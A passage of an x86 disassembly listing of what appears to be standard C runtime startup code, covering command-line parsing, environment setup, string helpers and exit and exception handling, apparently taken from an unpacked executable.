jmp short loc_40274C
; ---------------------------------------------------------------------------
loc_40277F: ; CODE XREF: sub_402730+12�j
; sub_402730+4B�j
lea edi, [ecx-1]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402784: ; CODE XREF: sub_402730+44�j
lea edi, [ecx-2]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402789: ; CODE XREF: sub_402730+3D�j
lea edi, [ecx-3]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_40278E: ; CODE XREF: sub_402730+39�j
lea edi, [ecx-4]
loc_402791: ; CODE XREF: sub_402720+5�j
; sub_402730+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4027B6
loc_40279D: ; CODE XREF: sub_402730+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_402808
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40279D
jmp short loc_4027B6
; ---------------------------------------------------------------------------
loc_4027B1: ; CODE XREF: sub_402730+9E�j
; sub_402730+B8�j
mov [edi], edx
add edi, 4
loc_4027B6: ; CODE XREF: sub_402730+6B�j
; sub_402730+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4027B1
test dl, dl
jz short loc_402808
test dh, dh
jz short loc_4027FF
test edx, 0FF0000h
jz short loc_4027F2
test edx, 0FF000000h
jz short loc_4027EA
jmp short loc_4027B1
; ---------------------------------------------------------------------------
loc_4027EA: ; CODE XREF: sub_402730+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027F2: ; CODE XREF: sub_402730+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027FF: ; CODE XREF: sub_402730+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402808: ; CODE XREF: sub_402730+72�j
; sub_402730+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402730 endp
; =============== S U B R O U T I N E =======================================
sub_402810 proc near ; CODE XREF: sub_401E30+19�p
arg_0 = dword ptr 4
cmp ds:dword_406CEC, 1
jle short loc_40282A
push 107h
push [esp+4+arg_0]
call sub_402A4C
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40282A: ; CODE XREF: sub_402810+7�j
mov eax, [esp+arg_0]
mov ecx, ds:off_406AE0
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_402810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40283E proc near ; CODE XREF: start+7�j
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405128
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call ds:dword_4050AC ; GetVersion
xor edx, edx
mov dl, ah
mov ds:dword_406F64, edx
mov ecx, eax
and ecx, 0FFh
mov ds:dword_406F60, ecx
shl ecx, 8
add ecx, edx
mov ds:dword_406F5C, ecx
shr eax, 10h
mov ds:dword_406F58, eax
xor esi, esi
push esi
call sub_403382
pop ecx
test eax, eax
jnz short loc_4028AA
push 1Ch
call sub_402959
pop ecx
loc_4028AA: ; CODE XREF: sub_40283E+62�j
mov [ebp+var_4], esi
call sub_4031D7
call ds:dword_4050A8 ; GetCommandLineA
mov ds:dword_407458, eax
call sub_4030A5
mov ds:dword_406F40, eax
call sub_402E58
call sub_402D9F
call sub_402AC1
mov [ebp+var_30], esi
lea eax, [ebp+var_5C]
push eax
call ds:dword_4050A4 ; GetStartupInfoA
call sub_402D47
mov [ebp+var_64], eax
test byte ptr [ebp+var_30], 1
jz short loc_4028F7
movzx eax, [ebp+var_2C]
jmp short loc_4028FA
; ---------------------------------------------------------------------------
loc_4028F7: ; CODE XREF: sub_40283E+B1�j
push 0Ah
pop eax
loc_4028FA: ; CODE XREF: sub_40283E+B7�j
push eax
push [ebp+var_64]
push esi
push esi
call ds:dword_4050A0 ; GetModuleHandleA
push eax
call sub_402029
mov [ebp+var_60], eax
push eax
call sub_402AEE
mov eax, [ebp+var_14]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp+var_68], ecx
push eax
push ecx
call sub_402BC3
pop ecx
pop ecx
retn
sub_40283E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402AFF
; =============== S U B R O U T I N E =======================================
sub_402934 proc near ; CODE XREF: sub_402D9F+4E�p
; sub_402D9F+7D�p ...
arg_0 = dword ptr 4
cmp ds:dword_406F48, 1
jnz short loc_402942
call sub_403590
loc_402942: ; CODE XREF: sub_402934+7�j
push [esp+arg_0]
call sub_4035C9
push 0FFh
call ds:off_406AD0
pop ecx
pop ecx
retn
sub_402934 endp
; =============== S U B R O U T I N E =======================================
sub_402959 proc near ; CODE XREF: sub_40283E+66�p
arg_0 = dword ptr 4
cmp ds:dword_406F48, 1
jnz short loc_402967
call sub_403590
loc_402967: ; CODE XREF: sub_402959+7�j
push [esp+arg_0]
call sub_4035C9
pop ecx
push 0FFh
call ds:dword_4050B0 ; ExitProcess
retn
sub_402959 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402996
loc_402980: ; CODE XREF: sub_402996+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402996
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402996 proc near ; CODE XREF: sub_402600+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402980 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4029BB
loc_4029A8: ; CODE XREF: sub_402996+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402980
test cl, cl
jz short loc_402A04
test edx, 3
jnz short loc_4029A8
loc_4029BB: ; CODE XREF: sub_402996+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4029C6: ; CODE XREF: sub_402996+5B�j
; sub_402996+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402A08
and eax, 81010100h
jz short loc_4029C6
and eax, 1010100h
jnz short loc_402A02
and esi, 80000000h
jnz short loc_4029C6
loc_402A02: ; CODE XREF: sub_402996+62�j
; sub_402996+7B�j ...
pop esi
pop edi
loc_402A04: ; CODE XREF: sub_402996+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402A08: ; CODE XREF: sub_402996+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402A45
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A3E
test ah, ah
jz short loc_402A02
shr eax, 10h
cmp al, bl
jz short loc_402A37
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A30
test ah, ah
jz short loc_402A02
jmp short loc_4029C6
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_402996+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A37: ; CODE XREF: sub_402996+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A3E: ; CODE XREF: sub_402996+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A45: ; CODE XREF: sub_402996+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402996 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A4C proc near ; CODE XREF: sub_402810+12�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402A6A
mov ecx, ds:off_406AE0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402ABC
; ---------------------------------------------------------------------------
loc_402A6A: ; CODE XREF: sub_402A4C+10�j
mov ecx, eax
push esi
mov esi, ds:off_406AE0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402A8F
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_402A98
; ---------------------------------------------------------------------------
loc_402A8F: ; CODE XREF: sub_402A4C+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_402A98: ; CODE XREF: sub_402A4C+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_40371C
add esp, 1Ch
test eax, eax
jnz short loc_402AB8
leave
retn
; ---------------------------------------------------------------------------
loc_402AB8: ; CODE XREF: sub_402A4C+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_402ABC: ; CODE XREF: sub_402A4C+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402A4C endp
; =============== S U B R O U T I N E =======================================
sub_402AC1 proc near ; CODE XREF: sub_40283E+93�p
mov eax, ds:dword_407454
test eax, eax
jz short loc_402ACC
call eax
loc_402ACC: ; CODE XREF: sub_402AC1+7�j
push offset dword_406010
push offset dword_406008
call sub_402BA9
push offset dword_406004
push offset dword_406000
call sub_402BA9
add esp, 10h
retn
sub_402AC1 endp
; =============== S U B R O U T I N E =======================================
sub_402AEE proc near ; CODE XREF: sub_40283E+D2�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402B10
add esp, 0Ch
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
sub_402AFF proc near ; CODE XREF: .text:0040292F�p
; sub_402934+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402B10
add esp, 0Ch
retn
sub_402AFF endp
; =============== S U B R O U T I N E =======================================
sub_402B10 proc near ; CODE XREF: sub_402AEE+8�p
; sub_402AFF+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp ds:dword_406F94, edi
jnz short loc_402B2D
push [esp+4+arg_0]
call ds:dword_4050B8 ; GetCurrentProcess
push eax
call ds:dword_4050B4 ; TerminateProcess
loc_402B2D: ; CODE XREF: sub_402B10+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov ds:dword_406F90, edi
mov ds:byte_406F8C, bl
jnz short loc_402B81
mov eax, ds:dword_407450
test eax, eax
jz short loc_402B70
mov ecx, ds:dword_40744C
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402B6F
loc_402B5C: ; CODE XREF: sub_402B10+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402B64
call eax
loc_402B64: ; CODE XREF: sub_402B10+50�j
sub esi, 4
cmp esi, ds:dword_407450
jnb short loc_402B5C
loc_402B6F: ; CODE XREF: sub_402B10+4A�j
pop esi
loc_402B70: ; CODE XREF: sub_402B10+3C�j
push offset dword_406018
push offset dword_406014
call sub_402BA9
pop ecx
pop ecx
loc_402B81: ; CODE XREF: sub_402B10+33�j
push offset dword_406020
push offset dword_40601C
call sub_402BA9
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402BA7
push [esp+4+arg_0]
mov ds:dword_406F94, edi
call ds:dword_4050B0 ; ExitProcess
loc_402BA7: ; CODE XREF: sub_402B10+85�j
pop edi
retn
sub_402B10 endp
; =============== S U B R O U T I N E =======================================
sub_402BA9 proc near ; CODE XREF: sub_402AC1+15�p
; sub_402AC1+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402BAE: ; CODE XREF: sub_402BA9+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402BC1
mov eax, [esi]
test eax, eax
jz short loc_402BBC
call eax
loc_402BBC: ; CODE XREF: sub_402BA9+F�j
add esi, 4
jmp short loc_402BAE
; ---------------------------------------------------------------------------
loc_402BC1: ; CODE XREF: sub_402BA9+9�j
pop esi
retn
sub_402BA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BC3 proc near ; CODE XREF: sub_40283E+E3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402D04
test eax, eax
pop ecx
jz loc_402CF8
mov ebx, [eax+8]
test ebx, ebx
jz loc_402CF8
cmp ebx, 5
jnz short loc_402BF4
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402D01
; ---------------------------------------------------------------------------
loc_402BF4: ; CODE XREF: sub_402BC3+23�j
cmp ebx, 1
jz loc_402CF3
mov ecx, ds:dword_406F98
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov ds:dword_406F98, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402CE3
mov ecx, ds:dword_406D70
mov edx, ds:dword_406D74
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402C43
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406D00h[esi*4]
loc_402C3A: ; CODE XREF: sub_402BC3+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402C3A
loc_402C43: ; CODE XREF: sub_402BC3+69�j
mov eax, [eax]
mov esi, ds:dword_406D7C
cmp eax, 0C000008Eh
jnz short loc_402C5E
mov ds:dword_406D7C, 83h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C5E: ; CODE XREF: sub_402BC3+8D�j
cmp eax, 0C0000090h
jnz short loc_402C71
mov ds:dword_406D7C, 81h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C71: ; CODE XREF: sub_402BC3+A0�j
cmp eax, 0C0000091h
jnz short loc_402C84
mov ds:dword_406D7C, 84h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C84: ; CODE XREF: sub_402BC3+B3�j
cmp eax, 0C0000093h
jnz short loc_402C97
mov ds:dword_406D7C, 85h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C97: ; CODE XREF: sub_402BC3+C6�j
cmp eax, 0C000008Dh
jnz short loc_402CAA
mov ds:dword_406D7C, 82h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CAA: ; CODE XREF: sub_402BC3+D9�j
cmp eax, 0C000008Fh
jnz short loc_402CBD
mov ds:dword_406D7C, 86h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CBD: ; CODE XREF: sub_402BC3+EC�j
cmp eax, 0C0000092h
jnz short loc_402CCE
mov ds:dword_406D7C, 8Ah
loc_402CCE: ; CODE XREF: sub_402BC3+99�j
; sub_402BC3+AC�j ...
push ds:dword_406D7C
push 8
call ebx ; _hread
pop ecx
mov ds:dword_406D7C, esi
pop ecx
pop esi
jmp short loc_402CEB
; ---------------------------------------------------------------------------
loc_402CE3: ; CODE XREF: sub_402BC3+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; _hread
pop ecx
loc_402CEB: ; CODE XREF: sub_402BC3+11E�j
mov eax, [ebp+arg_0]
mov ds:dword_406F98, eax
loc_402CF3: ; CODE XREF: sub_402BC3+34�j
or eax, 0FFFFFFFFh
jmp short loc_402D01
; ---------------------------------------------------------------------------
loc_402CF8: ; CODE XREF: sub_402BC3+F�j
; sub_402BC3+1A�j
push [ebp+arg_4]
call ds:dword_4050BC ; UnhandledExceptionFilter
loc_402D01: ; CODE XREF: sub_402BC3+2C�j
; sub_402BC3+133�j
pop ebx
pop ebp
retn
sub_402BC3 endp
; =============== S U B R O U T I N E =======================================
sub_402D04 proc near ; CODE XREF: sub_402BC3+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_406D78
cmp ds:dword_406CF8, edx
push esi
mov eax, offset dword_406CF8
jz short loc_402D31
lea esi, [ecx+ecx*2]
lea esi, ds:406CF8h[esi*4]
loc_402D26: ; CODE XREF: sub_402D04+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402D31
cmp [eax], edx
jnz short loc_402D26
loc_402D31: ; CODE XREF: sub_402D04+16�j
; sub_402D04+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406CF8h[ecx*4]
cmp eax, ecx
jnb short loc_402D44
cmp [eax], edx
jz short locret_402D46
loc_402D44: ; CODE XREF: sub_402D04+3A�j
xor eax, eax
locret_402D46: ; CODE XREF: sub_402D04+3E�j
retn
sub_402D04 endp
; =============== S U B R O U T I N E =======================================
sub_402D47 proc near ; CODE XREF: sub_40283E+A5�p
cmp ds:dword_407448, 0
jnz short loc_402D55
call sub_403C6B
loc_402D55: ; CODE XREF: sub_402D47+7�j
push esi
mov esi, ds:dword_407458
mov al, [esi]
cmp al, 22h
jnz short loc_402D87
loc_402D62: ; CODE XREF: sub_402D47+33�j
; sub_402D47+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402D7F
test al, al
jz short loc_402D7F
movzx eax, al
push eax
call sub_403865
test eax, eax
pop ecx
jz short loc_402D62
inc esi
jmp short loc_402D62
; ---------------------------------------------------------------------------
loc_402D7F: ; CODE XREF: sub_402D47+21�j
; sub_402D47+25�j
cmp byte ptr [esi], 22h
jnz short loc_402D91
loc_402D84: ; CODE XREF: sub_402D47+52�j
inc esi
jmp short loc_402D91
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402D47+19�j
cmp al, 20h
jbe short loc_402D91
loc_402D8B: ; CODE XREF: sub_402D47+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402D8B
loc_402D91: ; CODE XREF: sub_402D47+3B�j
; sub_402D47+3E�j ...
mov al, [esi]
test al, al
jz short loc_402D9B
cmp al, 20h
jbe short loc_402D84
loc_402D9B: ; CODE XREF: sub_402D47+4E�j
mov eax, esi
pop esi
retn
sub_402D47 endp
; =============== S U B R O U T I N E =======================================
sub_402D9F proc near ; CODE XREF: sub_40283E+8E�p
push ebx
xor ebx, ebx
cmp ds:dword_407448, ebx
push esi
push edi
jnz short loc_402DB1
call sub_403C6B
loc_402DB1: ; CODE XREF: sub_402D9F+B�j
mov esi, ds:dword_406F40
xor edi, edi
loc_402DB9: ; CODE XREF: sub_402D9F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402DD1
cmp al, 3Dh
jz short loc_402DC4
inc edi
loc_402DC4: ; CODE XREF: sub_402D9F+22�j
push esi
call sub_402210
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402DB9
; ---------------------------------------------------------------------------
loc_402DD1: ; CODE XREF: sub_402D9F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
mov ds:dword_406F74, esi
jnz short loc_402DF3
push 9
call sub_402934
pop ecx
loc_402DF3: ; CODE XREF: sub_402D9F+4A�j
mov edi, ds:dword_406F40
cmp [edi], bl
jz short loc_402E36
push ebp
loc_402DFE: ; CODE XREF: sub_402D9F+94�j
push edi
call sub_402210
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402E2F
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402E22
push 9
call sub_402934
pop ecx
loc_402E22: ; CODE XREF: sub_402D9F+79�j
push edi
push dword ptr [esi]
call sub_402720
pop ecx
add esi, 4
pop ecx
loc_402E2F: ; CODE XREF: sub_402D9F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402DFE
pop ebp
loc_402E36: ; CODE XREF: sub_402D9F+5C�j
push ds:dword_406F40
call sub_403C87
pop ecx
mov ds:dword_406F40, ebx
mov [esi], ebx
pop edi
pop esi
mov ds:dword_407444, 1
pop ebx
retn
sub_402D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E58 proc near ; CODE XREF: sub_40283E+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp ds:dword_407448, ebx
push esi
push edi
jnz short loc_402E6F
call sub_403C6B
loc_402E6F: ; CODE XREF: sub_402E58+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call ds:dword_405034 ; GetModuleFileNameA
mov eax, ds:dword_407458
mov ds:off_406F84, esi
mov edi, esi
cmp [eax], bl
jz short loc_402E94
mov edi, eax
loc_402E94: ; CODE XREF: sub_402E58+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402EF1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403CB6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402EC4
push 8
call sub_402934
pop ecx
loc_402EC4: ; CODE XREF: sub_402E58+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402EF1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov ds:dword_406F6C, esi
pop edi
pop esi
mov ds:dword_406F68, eax
pop ebx
leave
retn
sub_402E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EF1 proc near ; CODE XREF: sub_402E58+47�p
; sub_402E58+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_402F1B
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402F1B: ; CODE XREF: sub_402EF1+20�j
cmp byte ptr [eax], 22h
jnz short loc_402F64
loc_402F20: ; CODE XREF: sub_402EF1+58�j
; sub_402EF1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_402F52
test dl, dl
jz short loc_402F52
movzx edx, dl
test ds:byte_407221[edx], 4
jz short loc_402F45
inc dword ptr [ecx]
test esi, esi
jz short loc_402F45
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_402F45: ; CODE XREF: sub_402EF1+46�j
; sub_402EF1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F20
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_402F20
; ---------------------------------------------------------------------------
loc_402F52: ; CODE XREF: sub_402EF1+36�j
; sub_402EF1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F5C
and byte ptr [esi], 0
inc esi
loc_402F5C: ; CODE XREF: sub_402EF1+65�j
cmp byte ptr [eax], 22h
jnz short loc_402FA7
inc eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F64: ; CODE XREF: sub_402EF1+2D�j
; sub_402EF1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F6F
mov dl, [eax]
mov [esi], dl
inc esi
loc_402F6F: ; CODE XREF: sub_402EF1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test ds:byte_407221[ebx], 4
jz short loc_402F8A
inc dword ptr [ecx]
test esi, esi
jz short loc_402F89
mov bl, [eax]
mov [esi], bl
inc esi
loc_402F89: ; CODE XREF: sub_402EF1+91�j
inc eax
loc_402F8A: ; CODE XREF: sub_402EF1+8B�j
cmp dl, 20h
jz short loc_402F98
test dl, dl
jz short loc_402F9C
cmp dl, 9
jnz short loc_402F64
loc_402F98: ; CODE XREF: sub_402EF1+9C�j
test dl, dl
jnz short loc_402F9F
loc_402F9C: ; CODE XREF: sub_402EF1+A0�j
dec eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F9F: ; CODE XREF: sub_402EF1+A9�j
test esi, esi
jz short loc_402FA7
and byte ptr [esi-1], 0
loc_402FA7: ; CODE XREF: sub_402EF1+6E�j
; sub_402EF1+71�j ...
and [ebp+arg_10], 0
loc_402FAB: ; CODE XREF: sub_402EF1+19E�j
cmp byte ptr [eax], 0
jz loc_403094
loc_402FB4: ; CODE XREF: sub_402EF1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_402FC0
cmp dl, 9
jnz short loc_402FC3
loc_402FC0: ; CODE XREF: sub_402EF1+C8�j
inc eax
jmp short loc_402FB4
; ---------------------------------------------------------------------------
loc_402FC3: ; CODE XREF: sub_402EF1+CD�j
cmp byte ptr [eax], 0
jz loc_403094
test edi, edi
jz short loc_402FD8
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402FD8: ; CODE XREF: sub_402EF1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_402FDD: ; CODE XREF: sub_402EF1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_402FE6: ; CODE XREF: sub_402EF1+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_402FEF
inc eax
inc ebx
jmp short loc_402FE6
; ---------------------------------------------------------------------------
loc_402FEF: ; CODE XREF: sub_402EF1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_403020
test bl, 1
jnz short loc_40301E
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_40300D
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_40300D
mov eax, edx
jmp short loc_403010
; ---------------------------------------------------------------------------
loc_40300D: ; CODE XREF: sub_402EF1+10D�j
; sub_402EF1+116�j
mov [ebp+arg_0], edi
loc_403010: ; CODE XREF: sub_402EF1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_40301E: ; CODE XREF: sub_402EF1+106�j
shr ebx, 1
loc_403020: ; CODE XREF: sub_402EF1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_403035
inc ebx
loc_403028: ; CODE XREF: sub_402EF1+142�j
test esi, esi
jz short loc_403030
mov byte ptr [esi], 5Ch
inc esi
loc_403030: ; CODE XREF: sub_402EF1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_403028
loc_403035: ; CODE XREF: sub_402EF1+134�j
mov dl, [eax]
test dl, dl
jz short loc_403085
cmp [ebp+arg_10], 0
jnz short loc_40304B
cmp dl, 20h
jz short loc_403085
cmp dl, 9
jz short loc_403085
loc_40304B: ; CODE XREF: sub_402EF1+14E�j
cmp [ebp+arg_0], 0
jz short loc_40307F
test esi, esi
jz short loc_40306E
movzx ebx, dl
test ds:byte_407221[ebx], 4
jz short loc_403067
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403067: ; CODE XREF: sub_402EF1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40307D
; ---------------------------------------------------------------------------
loc_40306E: ; CODE XREF: sub_402EF1+162�j
movzx edx, dl
test ds:byte_407221[edx], 4
jz short loc_40307D
inc eax
inc dword ptr [ecx]
loc_40307D: ; CODE XREF: sub_402EF1+17B�j
; sub_402EF1+187�j
inc dword ptr [ecx]
loc_40307F: ; CODE XREF: sub_402EF1+15E�j
inc eax
jmp loc_402FDD
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: sub_402EF1+148�j
; sub_402EF1+153�j ...
test esi, esi
jz short loc_40308D
and byte ptr [esi], 0
inc esi
loc_40308D: ; CODE XREF: sub_402EF1+196�j
inc dword ptr [ecx]
jmp loc_402FAB
; ---------------------------------------------------------------------------
loc_403094: ; CODE XREF: sub_402EF1+BD�j
; sub_402EF1+D5�j
test edi, edi
jz short loc_40309B
and dword ptr [edi], 0
loc_40309B: ; CODE XREF: sub_402EF1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402EF1 endp
; =============== S U B R O U T I N E =======================================
sub_4030A5 proc near ; CODE XREF: sub_40283E+7F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_4070A0
push ebx
push ebp
mov ebp, ds:dword_4050D0
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4030F3
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4030D4
mov ds:dword_4070A0, 1
jmp short loc_4030FC
; ---------------------------------------------------------------------------
loc_4030D4: ; CODE XREF: sub_4030A5+21�j
call ds:dword_4050CC ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_4031CE
mov ds:dword_4070A0, 2
jmp loc_403182
; ---------------------------------------------------------------------------
loc_4030F3: ; CODE XREF: sub_4030A5+19�j
cmp eax, 1
jnz loc_40317D
